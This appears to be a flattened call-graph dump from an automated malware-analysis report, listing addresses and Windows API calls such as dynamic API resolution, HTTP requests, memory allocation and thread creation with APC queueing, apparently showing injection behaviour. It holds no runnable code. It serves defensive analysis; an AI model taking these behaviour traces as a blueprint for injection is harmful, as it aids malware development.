2761963be20 RtlFreeHeap 17610->17612 17872 276196217b0 17611->17872 17614 27619628e23 17612->17614 17616 27619628e2a 17614->17616 17621 27619628e34 17614->17621 17615 27619628e32 17617 2761964b4e0 RtlFreeHeap 17615->17617 17618 2761964b4e0 RtlFreeHeap 17616->17618 17619 27619628ea4 17617->17619 17618->17615 17620 2761964b4e0 RtlFreeHeap 17619->17620 17622 27619628eac 17620->17622 17624 2761964b4e0 RtlFreeHeap 17621->17624 17623 2761964b4e0 RtlFreeHeap 17622->17623 17625 27619628eb4 17623->17625 17626 27619628e5f 17624->17626 17627 2761964b4e0 RtlFreeHeap 17625->17627 17628 2761962a050 RtlFreeHeap 17626->17628 17629 27619628ebc 17627->17629 17630 27619628e71 17628->17630 17629->17190 17631 2761964b4e0 RtlFreeHeap 17630->17631 17632 27619628e79 17631->17632 17883 276196451d0 17632->17883 17635 2761964b4e0 RtlFreeHeap 17635->17611 17637 2761962fff9 17636->17637 17638 27619622939 17637->17638 17639 2761962cce0 LdrGetProcedureAddress 17637->17639 17656 2761962f8a0 17638->17656 17640 27619630072 17639->17640 17641 2761962cce0 LdrGetProcedureAddress 17640->17641 17642 2761963008d 17641->17642 17643 2761962cce0 LdrGetProcedureAddress 17642->17643 17644 276196300b6 17643->17644 17645 2761962cce0 LdrGetProcedureAddress 17644->17645 17646 276196300d5 17645->17646 17647 2761962cce0 LdrGetProcedureAddress 17646->17647 17648 276196300f4 17647->17648 17649 2761962cce0 LdrGetProcedureAddress 17648->17649 17650 27619630113 17649->17650 17651 2761962cce0 LdrGetProcedureAddress 17650->17651 17652 27619630132 17651->17652 17653 2761962cce0 LdrGetProcedureAddress 17652->17653 17654 27619630151 17653->17654 17655 2761962cce0 LdrGetProcedureAddress 17654->17655 17655->17638 17657 2761962f8da 17656->17657 17658 2761962293e 17657->17658 17659 2761962cce0 LdrGetProcedureAddress 17657->17659 17664 27619633470 17658->17664 17660 2761962f900 17659->17660 17661 2761962cce0 LdrGetProcedureAddress 17660->17661 17662 2761962f91b 17661->17662 17663 2761962cce0 LdrGetProcedureAddress 17662->17663 17663->17658 17666 27619633489 17664->17666 17665 27619633493 17665->17199 17666->17665 17667 2761962cce0 LdrGetProcedureAddress 17666->17667 17668 27619633502 17667->17668 17669 2761962cce0 LdrGetProcedureAddress 17668->17669 17670 2761963351d 17669->17670 17671 2761962cce0 LdrGetProcedureAddress 17670->17671 17672 27619633546 17671->17672 17673 2761962cce0 LdrGetProcedureAddress 17672->17673 17674 27619633565 17673->17674 17675 2761962cce0 LdrGetProcedureAddress 17674->17675 17676 27619633584 17675->17676 17677 2761962cce0 LdrGetProcedureAddress 17676->17677 17678 276196335a3 17677->17678 17679 2761962cce0 LdrGetProcedureAddress 17678->17679 17680 276196335c2 17679->17680 17681 2761962cce0 LdrGetProcedureAddress 17680->17681 17682 276196335e1 17681->17682 17683 2761962cce0 LdrGetProcedureAddress 17682->17683 17684 27619633600 17683->17684 17685 2761962cce0 LdrGetProcedureAddress 17684->17685 17686 2761963361f 17685->17686 17687 2761962cce0 LdrGetProcedureAddress 17686->17687 17688 2761963363e 17687->17688 17689 2761962cce0 LdrGetProcedureAddress 17688->17689 17690 2761963365d 17689->17690 17691 2761962cce0 LdrGetProcedureAddress 17690->17691 17692 2761963367c 17691->17692 17693 2761962cce0 LdrGetProcedureAddress 17692->17693 17694 2761963369b 17693->17694 17695 2761962cce0 LdrGetProcedureAddress 17694->17695 17696 276196336ba 17695->17696 17697 2761962cce0 LdrGetProcedureAddress 17696->17697 17698 276196336d9 17697->17698 17699 2761962cce0 LdrGetProcedureAddress 17698->17699 17700 276196336f8 17699->17700 17701 2761962cce0 LdrGetProcedureAddress 17700->17701 17702 27619633717 17701->17702 17703 2761962cce0 LdrGetProcedureAddress 17702->17703 17704 27619633736 17703->17704 17705 2761962cce0 LdrGetProcedureAddress 17704->17705 17706 27619633755 17705->17706 17707 2761962cce0 LdrGetProcedureAddress 17706->17707 17707->17665 17709 27619628eee CreateMutexExA 17708->17709 17710 27619653de0 17709->17710 17712 27619653e14 17710->17712 17711 27619628f71 17711->17336 17712->17711 17713 2761964b4e0 RtlFreeHeap 17712->17713 17713->17712 17715 27619628016 17714->17715 17716 2761964557b 17714->17716 17715->17374 17718 2761963be20 17715->17718 17716->17715 17717 2761964b4e0 RtlFreeHeap 17716->17717 17717->17715 17719 2761963be5c 17718->17719 17720 2761963bea5 17719->17720 17721 2761964b4e0 RtlFreeHeap 17719->17721 17720->17374 17721->17720 17724 2761962a084 17722->17724 17723 2761962a118 17723->17427 17724->17723 17725 2761964b4e0 RtlFreeHeap 17724->17725 17725->17724 17728 27619633287 17726->17728 17727 27619633291 17727->17544 17728->17727 17729 2761962cce0 LdrGetProcedureAddress 17728->17729 17730 27619633306 17729->17730 17731 2761962cce0 LdrGetProcedureAddress 17730->17731 17732 27619633321 17731->17732 17733 2761962cce0 LdrGetProcedureAddress 17732->17733 17734 2761963334a 17733->17734 17735 2761962cce0 LdrGetProcedureAddress 17734->17735 17736 27619633369 17735->17736 17737 2761962cce0 LdrGetProcedureAddress 17736->17737 17738 27619633388 17737->17738 17739 2761962cce0 LdrGetProcedureAddress 17738->17739 17740 276196333a7 17739->17740 17741 2761962cce0 LdrGetProcedureAddress 17740->17741 17742 276196333c6 17741->17742 17743 2761962cce0 LdrGetProcedureAddress 17742->17743 17744 276196333e5 17743->17744 17745 2761962cce0 LdrGetProcedureAddress 17744->17745 17746 27619633404 17745->17746 17747 2761962cce0 LdrGetProcedureAddress 17746->17747 17748 27619633423 17747->17748 17749 2761962cce0 LdrGetProcedureAddress 17748->17749 17749->17727 17751 27619637037 17750->17751 17752 27619637319 17751->17752 17753 276196370a9 17751->17753 17754 2761964b4e0 RtlFreeHeap 17752->17754 17849 276196293f0 17753->17849 17756 2761963732d 17754->17756 17758 276196293f0 RtlFreeHeap 17756->17758 17760 27619637339 17758->17760 17759 2761962a050 RtlFreeHeap 17761 276196370ce 17759->17761 17762 2761962a050 RtlFreeHeap 17760->17762 17763 276196293f0 RtlFreeHeap 17761->17763 17764 2761963734d 17762->17764 17765 276196370d9 17763->17765 17767 276196293f0 RtlFreeHeap 17764->17767 17766 2761962a050 RtlFreeHeap 17765->17766 17768 27619637106 17766->17768 17769 27619637358 17767->17769 17855 27619627370 17768->17855 17770 2761962a050 RtlFreeHeap 17769->17770 17772 27619637385 17770->17772 17773 27619627370 2 API calls 17772->17773 17775 276196373b9 17773->17775 17774 27619637740 17776 2761964b4e0 RtlFreeHeap 17774->17776 17775->17774 17778 2761964b4e0 RtlFreeHeap 17775->17778 17777 2761963775a 17776->17777 17777->17569 17779 276196373cc 17778->17779 17781 276196293f0 RtlFreeHeap 17779->17781 17780 2761964b4e0 RtlFreeHeap 17798 2761963713a 17780->17798 17783 276196373db 17781->17783 17782 27619637257 17785 2761964b4e0 RtlFreeHeap 17782->17785 17803 27619637452 17782->17803 17787 2761962a050 RtlFreeHeap 17783->17787 17784 276196293f0 RtlFreeHeap 17784->17798 17788 27619637282 17785->17788 17786 2761964b4e0 RtlFreeHeap 17786->17803 17796 27619637409 17787->17796 17790 276196293f0 RtlFreeHeap 17788->17790 17789 2761962a050 RtlFreeHeap 17789->17798 17793 27619637292 17790->17793 17791 276196293f0 RtlFreeHeap 17791->17803 17792 27619627370 2 API calls 17792->17796 17794 2761962a050 RtlFreeHeap 17793->17794 17801 276196372d1 17794->17801 17795 2761962a050 RtlFreeHeap 17795->17803 17796->17792 17796->17803 17797 27619627370 2 API calls 17797->17798 17798->17774 17798->17780 17798->17782 17798->17784 17798->17789 17798->17797 17799 27619627370 2 API calls 17799->17801 17800 27619627370 2 API calls 17800->17803 17801->17799 17801->17803 17802 276196374f8 17804 2761963750e 17802->17804 17805 2761964b4e0 RtlFreeHeap 17802->17805 17803->17786 17803->17791 17803->17795 17803->17800 17803->17802 17804->17774 17806 2761964b4e0 RtlFreeHeap 17804->17806 17805->17804 17807 27619637529 17806->17807 17808 2761962a050 RtlFreeHeap 17807->17808 17811 2761963754c 17808->17811 17809 27619627370 2 API calls 17809->17811 17810 2761964b4e0 RtlFreeHeap 17810->17811 17811->17809 17811->17810 17815 276196375b1 17811->17815 17812 2761964b4e0 RtlFreeHeap 17812->17815 17813 276196293f0 RtlFreeHeap 17813->17815 17814 27619627370 2 API calls 17814->17815 17815->17774 17815->17812 17815->17813 17815->17814 17816 2761963769e 17815->17816 17817 2761962a050 RtlFreeHeap 17815->17817 17818 2761964b4e0 RtlFreeHeap 17816->17818 17817->17815 17819 276196376a6 17818->17819 17820 276196293f0 RtlFreeHeap 17819->17820 17821 276196376b2 17820->17821 17822 2761962a050 RtlFreeHeap 17821->17822 17825 276196376e5 17822->17825 17823 27619627370 2 API calls 17823->17825 17824 2761964b4e0 RtlFreeHeap 17824->17825 17825->17774 17825->17823 17825->17824 17827 2761962788a InternetOpenW 17826->17827 17828 27619627885 17826->17828 17829 27619627898 InternetConnectW 17827->17829 17830 27619627aed 17827->17830 17828->17827 17829->17830 17835 276196278dd 17829->17835 17831 27619627b0e InternetCloseHandle 17830->17831 17832 27619627b17 17830->17832 17831->17832 17833 27619627b56 17832->17833 17836 27619627b8c 17832->17836 17837 27619627b60 17832->17837 17834 2761964b4e0 RtlFreeHeap 17833->17834 17833->17837 17834->17837 17835->17830 17838 276196279cb HttpSendRequestA 17835->17838 17839 2761962a050 RtlFreeHeap 17836->17839 17837->17569 17838->17830 17841 276196279e4 17838->17841 17840 27619627ba4 17839->17840 17842 2761964b4e0 RtlFreeHeap 17840->17842 17843 2761964b4e0 RtlFreeHeap 17841->17843 17847 27619627a24 17841->17847 17842->17837 17843->17847 17844 27619627a3f InternetQueryDataAvailable 17845 27619627ae3 17844->17845 17844->17847 17846 2761964b4e0 RtlFreeHeap 17845->17846 17846->17830 17847->17844 17847->17845 17848 27619627a98 RtlReAllocateHeap 17847->17848 17848->17847 17850 27619629400 17849->17850 17851 27619629483 17850->17851 17854 2761964b4e0 RtlFreeHeap 17850->17854 17852 2761964b4e0 RtlFreeHeap 17851->17852 17853 276196294f0 17852->17853 17853->17759 17854->17851 17862 2761962fb20 17855->17862 17857 276196273a4 17858 27619627422 17857->17858 17861 2761962a050 RtlFreeHeap 17857->17861 17859 2761964b4e0 RtlFreeHeap 17858->17859 17860 2761962780a 17859->17860 17860->17798 17861->17857 17863 2761962fb39 17862->17863 17864 2761962fb43 17863->17864 17865 2761962cce0 LdrGetProcedureAddress 17863->17865 17864->17857 17866 2761962fbae 17865->17866 17867 2761962cce0 LdrGetProcedureAddress 17866->17867 17868 2761962fbc9 17867->17868 17869 2761962cce0 LdrGetProcedureAddress 17868->17869 17870 2761962fbf0 17869->17870 17871 2761962cce0 LdrGetProcedureAddress 17870->17871 17871->17864 17882 276196217f5 17872->17882 17873 2761962180f 17874 2761964b4e0 RtlFreeHeap 17873->17874 17875 27619621820 17874->17875 17876 2761964b4e0 RtlFreeHeap 17875->17876 17877 27619621838 17876->17877 17878 2761962a050 RtlFreeHeap 17877->17878 17879 27619621b61 17877->17879 17880 2761964b4e0 RtlFreeHeap 17877->17880 17878->17877 17879->17615 17880->17877 17882->17873 17887 27619624cd0 17882->17887 17884 276196451e5 17883->17884 17885 2761964b4e0 RtlFreeHeap 17884->17885 17886 27619628e86 17884->17886 17885->17886 17886->17635 17888 27619654360 NtCreateThreadEx 17887->17888 17889 27619624d3d 17888->17889 17890 27619654ff0 NtQueueApcThread 17889->17890 17891 27619624d58 17890->17891 17891->17882 16730 276196271b0 16731 276196271c6 16730->16731 16738 27619622950 16731->16738 16734 276196271f5 16755 27619654360 16734->16755 16737 2761962732d 16763 276196316a0 16738->16763 16740 27619622959 16935 276196301a0 16740->16935 16742 27619622963 16743 27619630f99 16742->16743 17139 2761962cce0 16742->17139 16743->16734 16746 2761962cce0 LdrGetProcedureAddress 16747 27619630f13 16746->16747 16748 2761962cce0 LdrGetProcedureAddress 16747->16748 16749 27619630f3c 16748->16749 16750 2761962cce0 LdrGetProcedureAddress 16749->16750 16751 27619630f5b 16750->16751 16752 2761962cce0 LdrGetProcedureAddress 16751->16752 16753 27619630f7a 16752->16753 16754 2761962cce0 LdrGetProcedureAddress 16753->16754 16754->16743 16756 276196543bd 16755->16756 16757 2761962730e 16756->16757 16758 2761965444e NtCreateThreadEx 16756->16758 16759 27619654ff0 16757->16759 16758->16757 16761 27619655011 16759->16761 16760 2761965506c 16760->16737 16761->16760 16762 2761965506a NtQueueApcThread 16761->16762 16762->16760 16764 276196316a9 16763->16764 16765 276196321e1 16764->16765 16766 2761962cce0 LdrGetProcedureAddress 16764->16766 16765->16740 16767 276196316c8 16766->16767 16768 2761962cce0 LdrGetProcedureAddress 16767->16768 16769 276196316e0 16768->16769 16770 2761962cce0 LdrGetProcedureAddress 16769->16770 16771 276196316f8 16770->16771 16772 2761962cce0 LdrGetProcedureAddress 16771->16772 16773 27619631710 16772->16773 16774 2761962cce0 LdrGetProcedureAddress 16773->16774 16775 27619631728 16774->16775 16776 2761962cce0 LdrGetProcedureAddress 16775->16776 16777 27619631740 16776->16777 16778 2761962cce0 LdrGetProcedureAddress 16777->16778 16779 27619631758 16778->16779 16780 2761962cce0 LdrGetProcedureAddress 16779->16780 16781 27619631770 16780->16781 16782 2761962cce0 LdrGetProcedureAddress 16781->16782 16783 27619631788 16782->16783 16784 2761962cce0 LdrGetProcedureAddress 16783->16784 16785 276196317a0 16784->16785 16786 2761962cce0 LdrGetProcedureAddress 16785->16786 16787 276196317b8 16786->16787 16788 2761962cce0 LdrGetProcedureAddress 16787->16788 16789 276196317d0 16788->16789 16790 2761962cce0 LdrGetProcedureAddress 16789->16790 16791 276196317e8 16790->16791 16792 2761962cce0 LdrGetProcedureAddress 16791->16792 16793 27619631800 16792->16793 16794 2761962cce0 LdrGetProcedureAddress 16793->16794 16795 27619631818 16794->16795 16796 2761962cce0 LdrGetProcedureAddress 16795->16796 16797 27619631830 16796->16797 16798 2761962cce0 LdrGetProcedureAddress 16797->16798 16799 27619631848 16798->16799 16800 2761962cce0 LdrGetProcedureAddress 16799->16800 16801 27619631860 16800->16801 16802 2761962cce0 LdrGetProcedureAddress 16801->16802 16803 27619631878 16802->16803 16804 2761962cce0 LdrGetProcedureAddress 16803->16804 16805 27619631890 16804->16805 16806 2761962cce0 LdrGetProcedureAddress 16805->16806 16807 276196318a8 16806->16807 16808 2761962cce0 LdrGetProcedureAddress 16807->16808 16809 276196318c0 16808->16809 16810 2761962cce0 LdrGetProcedureAddress 16809->16810 16811 276196318d8 16810->16811 16812 2761962cce0 LdrGetProcedureAddress 16811->16812 16813 276196318f0 16812->16813 16814 2761962cce0 LdrGetProcedureAddress 16813->16814 16815 27619631908 16814->16815 16816 2761962cce0 LdrGetProcedureAddress 16815->16816 16817 27619631920 16816->16817 16818 2761962cce0 LdrGetProcedureAddress 16817->16818 16819 27619631938 16818->16819 16820 2761962cce0 LdrGetProcedureAddress 16819->16820 16821 27619631950 16820->16821 16822 2761962cce0 LdrGetProcedureAddress 16821->16822 16823 27619631968 16822->16823 16824 2761962cce0 LdrGetProcedureAddress 16823->16824 16825 27619631980 16824->16825 16826 2761962cce0 LdrGetProcedureAddress 16825->16826 16827 27619631998 16826->16827 16828 2761962cce0 LdrGetProcedureAddress 16827->16828 16829 276196319b0 16828->16829 16830 2761962cce0 LdrGetProcedureAddress 16829->16830 16831 276196319c8 16830->16831 16832 2761962cce0 LdrGetProcedureAddress 16831->16832 16833 276196319e0 16832->16833 16834 2761962cce0 LdrGetProcedureAddress 16833->16834 16835 276196319f8 16834->16835 16836 2761962cce0 LdrGetProcedureAddress 16835->16836 16837 27619631a10 16836->16837 16838 2761962cce0 LdrGetProcedureAddress 16837->16838 16839 27619631a28 16838->16839 16840 2761962cce0 LdrGetProcedureAddress 16839->16840 16841 27619631a40 16840->16841 16842 2761962cce0 LdrGetProcedureAddress 16841->16842 16843 27619631a58 16842->16843 16844 2761962cce0 LdrGetProcedureAddress 16843->16844 16845 27619631a70 16844->16845 16846 2761962cce0 LdrGetProcedureAddress 16845->16846 16847 27619631a88 16846->16847 16848 2761962cce0 LdrGetProcedureAddress 16847->16848 16849 27619631aa0 16848->16849 16850 2761962cce0 LdrGetProcedureAddress 16849->16850 16851 27619631ab8 16850->16851 16852 2761962cce0 LdrGetProcedureAddress 16851->16852 16853 27619631ad0 16852->16853 16854 2761962cce0 LdrGetProcedureAddress 16853->16854 16855 27619631ae8 16854->16855 16856 2761962cce0 LdrGetProcedureAddress 16855->16856 16857 27619631b00 16856->16857 16858 2761962cce0 LdrGetProcedureAddress 16857->16858 16859 27619631b18 16858->16859 16860 2761962cce0 LdrGetProcedureAddress 16859->16860 16861 27619631b30 16860->16861 16862 2761962cce0 LdrGetProcedureAddress 16861->16862 16863 27619631b48 16862->16863 16864 2761962cce0 LdrGetProcedureAddress 16863->16864 16865 27619631b60 16864->16865 16866 2761962cce0 LdrGetProcedureAddress 16865->16866 16867 27619631b78 16866->16867 16868 2761962cce0 LdrGetProcedureAddress 16867->16868 16869 27619631b90 16868->16869 16870 2761962cce0 LdrGetProcedureAddress 16869->16870 16871 27619631bc1 16870->16871 16872 2761962cce0 LdrGetProcedureAddress 16871->16872 16873 27619631bf2 16872->16873 16874 2761962cce0 LdrGetProcedureAddress 16873->16874 16875 27619631c23 16874->16875 16876 2761962cce0 LdrGetProcedureAddress 16875->16876 16877 27619631c54 16876->16877 16878 2761962cce0 LdrGetProcedureAddress 16877->16878 16879 27619631c85 16878->16879 16880 2761962cce0 LdrGetProcedureAddress 16879->16880 16881 27619631cb6 16880->16881 16882 2761962cce0 LdrGetProcedureAddress 16881->16882 16883 27619631ce7 16882->16883 16884 2761962cce0 LdrGetProcedureAddress 16883->16884 16885 27619631d18 16884->16885 16886 2761962cce0 LdrGetProcedureAddress 16885->16886 16887 27619631d49 16886->16887 16888 2761962cce0 LdrGetProcedureAddress 16887->16888 16889 27619631d7a 16888->16889 16890 2761962cce0 LdrGetProcedureAddress 16889->16890 16891 27619631dab 16890->16891 16892 2761962cce0 LdrGetProcedureAddress 16891->16892 16893 27619631ddc 16892->16893 16894 2761962cce0 LdrGetProcedureAddress 16893->16894 16895 27619631e0d 16894->16895 16896 2761962cce0 LdrGetProcedureAddress 16895->16896 16897 27619631e3e 16896->16897 16898 2761962cce0 LdrGetProcedureAddress 16897->16898 16899 27619631e6f 16898->16899 16900 2761962cce0 LdrGetProcedureAddress 16899->16900 16901 27619631ea0 16900->16901 16902 2761962cce0 LdrGetProcedureAddress 16901->16902 16903 27619631ed1 16902->16903 16904 2761962cce0 LdrGetProcedureAddress 16903->16904 16905 27619631f02 16904->16905 16906 2761962cce0 LdrGetProcedureAddress 16905->16906 16907 27619631f33 16906->16907 16908 2761962cce0 LdrGetProcedureAddress 16907->16908 16909 27619631f64 16908->16909 16910 2761962cce0 LdrGetProcedureAddress 16909->16910 16911 27619631f95 16910->16911 16912 2761962cce0 LdrGetProcedureAddress 16911->16912 16913 27619631fc6 16912->16913 16914 2761962cce0 LdrGetProcedureAddress 16913->16914 16915 27619631ff7 16914->16915 16916 2761962cce0 LdrGetProcedureAddress 16915->16916 16917 27619632028 16916->16917 16918 2761962cce0 LdrGetProcedureAddress 16917->16918 16919 27619632059 16918->16919 16920 2761962cce0 LdrGetProcedureAddress 16919->16920 16921 2761963208a 16920->16921 16922 2761962cce0 LdrGetProcedureAddress 16921->16922 16923 276196320bb 16922->16923 16924 2761962cce0 LdrGetProcedureAddress 16923->16924 16925 276196320ec 16924->16925 16926 2761962cce0 LdrGetProcedureAddress 16925->16926 16927 2761963211d 16926->16927 16928 2761962cce0 LdrGetProcedureAddress 16927->16928 16929 2761963214e 16928->16929 16930 2761962cce0 LdrGetProcedureAddress 16929->16930 16931 2761963217f 16930->16931 16932 2761962cce0 LdrGetProcedureAddress 16931->16932 16933 276196321b0 16932->16933 16934 2761962cce0 LdrGetProcedureAddress 16933->16934 16934->16765 16936 276196301ce 16935->16936 16937 2761962cce0 LdrGetProcedureAddress 16936->16937 17138 27619630e4a 16936->17138 16938 27619630228 16937->16938 16939 2761962cce0 LdrGetProcedureAddress 16938->16939 16940 27619630243 16939->16940 16941 2761962cce0 LdrGetProcedureAddress 16940->16941 16942 2761963026c 16941->16942 16943 2761962cce0 LdrGetProcedureAddress 16942->16943 16944 2761963028b 16943->16944 16945 2761962cce0 LdrGetProcedureAddress 16944->16945 16946 276196302aa 16945->16946 16947 2761962cce0 LdrGetProcedureAddress 16946->16947 16948 276196302c9 16947->16948 16949 2761962cce0 LdrGetProcedureAddress 16948->16949 16950 276196302e8 16949->16950 16951 2761962cce0 LdrGetProcedureAddress 16950->16951 16952 27619630307 16951->16952 16953 2761962cce0 LdrGetProcedureAddress 16952->16953 16954 27619630326 16953->16954 16955 2761962cce0 LdrGetProcedureAddress 16954->16955 16956 27619630345 16955->16956 16957 2761962cce0 LdrGetProcedureAddress 16956->16957 16958 27619630364 16957->16958 16959 2761962cce0 LdrGetProcedureAddress 16958->16959 16960 27619630383 16959->16960 16961 2761962cce0 LdrGetProcedureAddress 16960->16961 16962 276196303a2 16961->16962 16963 2761962cce0 LdrGetProcedureAddress 16962->16963 16964 276196303c1 16963->16964 16965 2761962cce0 LdrGetProcedureAddress 16964->16965 16966 276196303e0 16965->16966 16967 2761962cce0 LdrGetProcedureAddress 16966->16967 16968 276196303ff 16967->16968 16969 2761962cce0 LdrGetProcedureAddress 16968->16969 16970 2761963041e 16969->16970 16971 2761962cce0 LdrGetProcedureAddress 16970->16971 16972 2761963043d 16971->16972 16973 2761962cce0 LdrGetProcedureAddress 16972->16973 16974 2761963045c 16973->16974 16975 2761962cce0 LdrGetProcedureAddress 16974->16975 16976 2761963047b 16975->16976 16977 2761962cce0 LdrGetProcedureAddress 16976->16977 16978 2761963049a 16977->16978 16979 2761962cce0 LdrGetProcedureAddress 16978->16979 16980 276196304b9 16979->16980 16981 2761962cce0 LdrGetProcedureAddress 16980->16981 16982 276196304d8 16981->16982 16983 2761962cce0 LdrGetProcedureAddress 16982->16983 16984 276196304f7 16983->16984 16985 2761962cce0 LdrGetProcedureAddress 16984->16985 16986 27619630516 16985->16986 16987 2761962cce0 LdrGetProcedureAddress 16986->16987 16988 27619630535 16987->16988 16989 2761962cce0 LdrGetProcedureAddress 16988->16989 16990 27619630554 16989->16990 16991 2761962cce0 LdrGetProcedureAddress 16990->16991 16992 27619630573 16991->16992 16993 2761962cce0 LdrGetProcedureAddress 16992->16993 16994 27619630592 16993->16994 16995 2761962cce0 LdrGetProcedureAddress 16994->16995 16996 276196305b1 16995->16996 16997 2761962cce0 LdrGetProcedureAddress 16996->16997 16998 276196305d0 16997->16998 16999 2761962cce0 LdrGetProcedureAddress 16998->16999 17000 276196305ef 16999->17000 17001 2761962cce0 LdrGetProcedureAddress 17000->17001 17002 2761963060e 17001->17002 17003 2761962cce0 LdrGetProcedureAddress 17002->17003 17004 2761963062d 17003->17004 17005 2761962cce0 LdrGetProcedureAddress 17004->17005 17006 2761963064c 17005->17006 17007 2761962cce0 LdrGetProcedureAddress 17006->17007 17008 2761963066b 17007->17008 17009 2761962cce0 LdrGetProcedureAddress 17008->17009 17010 2761963068a 17009->17010 17011 2761962cce0 LdrGetProcedureAddress 17010->17011 17012 276196306a9 17011->17012 17013 2761962cce0 LdrGetProcedureAddress 17012->17013 17014 276196306c8 17013->17014 17015 2761962cce0 LdrGetProcedureAddress 17014->17015 17016 276196306e7 17015->17016 17017 2761962cce0 LdrGetProcedureAddress 17016->17017 17018 27619630706 17017->17018 17019 2761962cce0 LdrGetProcedureAddress 17018->17019 17020 27619630725 17019->17020 17021 2761962cce0 LdrGetProcedureAddress 17020->17021 17022 27619630744 17021->17022 17023 2761962cce0 LdrGetProcedureAddress 17022->17023 17024 27619630763 17023->17024 17025 2761962cce0 LdrGetProcedureAddress 17024->17025 17026 27619630782 17025->17026 17027 2761962cce0 LdrGetProcedureAddress 17026->17027 17028 276196307a1 17027->17028 17029 2761962cce0 LdrGetProcedureAddress 17028->17029 17030 276196307c0 17029->17030 17031 2761962cce0 LdrGetProcedureAddress 17030->17031 17032 276196307df 17031->17032 17033 2761962cce0 LdrGetProcedureAddress 17032->17033 17034 276196307fe 17033->17034 17035 2761962cce0 LdrGetProcedureAddress 17034->17035 17036 2761963081d 17035->17036 17037 2761962cce0 LdrGetProcedureAddress 17036->17037 17038 2761963083c 17037->17038 17039 2761962cce0 LdrGetProcedureAddress 17038->17039 17040 2761963085b 17039->17040 17041 2761962cce0 LdrGetProcedureAddress 17040->17041 17042 2761963087a 17041->17042 17043 2761962cce0 LdrGetProcedureAddress 17042->17043 17044 27619630899 17043->17044 17045 2761962cce0 LdrGetProcedureAddress 17044->17045 17046 276196308b8 17045->17046 17047 2761962cce0 LdrGetProcedureAddress 17046->17047 17048 276196308d7 17047->17048 17049 2761962cce0 LdrGetProcedureAddress 17048->17049 17050 276196308f6 17049->17050 17051 2761962cce0 LdrGetProcedureAddress 17050->17051 17052 27619630915 17051->17052 17053 2761962cce0 LdrGetProcedureAddress 17052->17053 17054 27619630934 17053->17054 17055 2761962cce0 LdrGetProcedureAddress 17054->17055 17056 27619630953 17055->17056 17057 2761962cce0 LdrGetProcedureAddress 17056->17057 17058 27619630972 17057->17058 17059 2761962cce0 LdrGetProcedureAddress 17058->17059 17060 27619630991 17059->17060 17061 2761962cce0 LdrGetProcedureAddress 17060->17061 17062 276196309b0 17061->17062 17063 2761962cce0 LdrGetProcedureAddress 17062->17063 17064 276196309cf 17063->17064 17065 2761962cce0 LdrGetProcedureAddress 17064->17065 17066 276196309ee 17065->17066 17067 2761962cce0 LdrGetProcedureAddress 17066->17067 17068 27619630a0d 17067->17068 17069 2761962cce0 LdrGetProcedureAddress 17068->17069 17070 27619630a2c 17069->17070 17071 2761962cce0 LdrGetProcedureAddress 17070->17071 17072 27619630a4b 17071->17072 17073 2761962cce0 LdrGetProcedureAddress 17072->17073 17074 27619630a6a 17073->17074 17075 2761962cce0 LdrGetProcedureAddress 17074->17075 17076 27619630a89 17075->17076 17077 2761962cce0 LdrGetProcedureAddress 17076->17077 17078 27619630aa8 17077->17078 17079 2761962cce0 LdrGetProcedureAddress 17078->17079 17080 27619630ac7 17079->17080 17081 2761962cce0 LdrGetProcedureAddress 17080->17081 17082 27619630ae6 17081->17082 17083 2761962cce0 LdrGetProcedureAddress 17082->17083 17084 27619630b05 17083->17084 17085 2761962cce0 LdrGetProcedureAddress 17084->17085 17086 27619630b24 17085->17086 17087 2761962cce0 LdrGetProcedureAddress 17086->17087 17088 27619630b43 17087->17088 17089 2761962cce0 LdrGetProcedureAddress 17088->17089 17090 27619630b62 17089->17090 17091 2761962cce0 LdrGetProcedureAddress 17090->17091 17092 27619630b81 17091->17092 17093 2761962cce0 LdrGetProcedureAddress 17092->17093 17094 27619630ba0 17093->17094 17095 2761962cce0 LdrGetProcedureAddress 17094->17095 17096 27619630bbf 17095->17096 17097 2761962cce0 LdrGetProcedureAddress 17096->17097 17098 27619630bde 17097->17098 17099 2761962cce0 LdrGetProcedureAddress 17098->17099 17100 27619630bfd 17099->17100 17101 2761962cce0 LdrGetProcedureAddress 17100->17101 17102 27619630c1c 17101->17102 17103 2761962cce0 LdrGetProcedureAddress 17102->17103 17104 27619630c3b 17103->17104 17105 2761962cce0 LdrGetProcedureAddress 17104->17105 17106 27619630c5a 17105->17106 17107 2761962cce0 LdrGetProcedureAddress 17106->17107 17108 27619630c79 17107->17108 17109 2761962cce0 LdrGetProcedureAddress 17108->17109 17110 27619630c98 17109->17110 17111 2761962cce0 LdrGetProcedureAddress 17110->17111 17112 27619630cb7 17111->17112 17113 2761962cce0 LdrGetProcedureAddress 17112->17113 17114 27619630cd6 17113->17114 17115 2761962cce0 LdrGetProcedureAddress 17114->17115 17116 27619630cf5 17115->17116 17117 2761962cce0 LdrGetProcedureAddress 17116->17117 17118 27619630d14 17117->17118 17119 2761962cce0 LdrGetProcedureAddress 17118->17119 17120 27619630d33 17119->17120 17121 2761962cce0 LdrGetProcedureAddress 17120->17121 17122 27619630d52 17121->17122 17123 2761962cce0 LdrGetProcedureAddress 17122->17123 17124 27619630d71 17123->17124 17125 2761962cce0 LdrGetProcedureAddress 17124->17125 17126 27619630d90 17125->17126 17127 2761962cce0 LdrGetProcedureAddress 17126->17127 17128 27619630daf 17127->17128 17129 2761962cce0 LdrGetProcedureAddress 17128->17129 17130 27619630dce 17129->17130 17131 2761962cce0 LdrGetProcedureAddress 17130->17131 17132 27619630ded 17131->17132 17133 2761962cce0 LdrGetProcedureAddress 17132->17133 17134 27619630e0c 17133->17134 17135 2761962cce0 LdrGetProcedureAddress 17134->17135 17136 27619630e2b 17135->17136 17137 2761962cce0 LdrGetProcedureAddress 17136->17137 17137->17138 17138->16742 17141 2761962cd1b 17139->17141 17140 2761962cdbf 17140->16746 17141->17140 17142 2761962cd9b LdrGetProcedureAddress 17141->17142 17142->17140 17892 27619653f40 17894 27619653f69 17892->17894 17893 27619653fc9 17894->17893 17895 27619653fc7 NtAllocateVirtualMemory 17894->17895 17895->17893

                                                                    Executed Functions

                                                                    Function 0000027619644D00 Relevance: 10.8, APIs: 7, Instructions: 282COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
